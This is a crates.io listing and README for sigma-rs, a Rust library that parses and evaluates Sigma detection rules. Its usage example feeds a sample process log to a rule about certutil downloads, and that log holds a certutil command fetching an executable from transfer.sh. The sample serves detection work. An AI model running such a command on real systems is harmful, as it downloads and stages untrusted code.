sigma-rs
| Crates.io | sigma-rs |
| lib.rs | sigma-rs |
| version | 0.1.0 |
| source | src |
| created_at | 2024-03-18 10:48:27.434668 |
| updated_at | 2024-03-18 10:48:27.434668 |
| description | A Rust implementation and parser of Sigma rules |
| homepage | |
| repository | https://github.com/Litch1-v/sigma-rs |
| max_upload_size | |
| id | 1177564 |
| size | 21,720 |
Litchi (Litch1-v)
documentation
README
sigma-rs
A Rust implementation and parser of Sigma rules. Useful for building your own detection pipelines.
Features
- support complex condition like
(not test*) and ((1 of test1) or (all of test)) - regex build cache
Usage
let rule = r#"title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE#;
let json = r#"{
"Image": "C:\\Windows\\system32\\certutil.exe",
"ParentImage": "C:\\WINDOWS\\system32\\cmd.exe",
"ProcessId": "10952",
"utc_time": "2023-03-20 17:31:23",
"ServerScore": "0",
"CommandLine": "certutil -urlcache \"-split\" \"-f\" \"http://transfer.sh/artifact.exe test.exe\"",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"OriginalFile": "CertUtil.exe.mui",
"log_type": "ProcessCreate"
}"#
println!("{}", evaluate_sigma(parse_sigma(rule.to_string()), &source));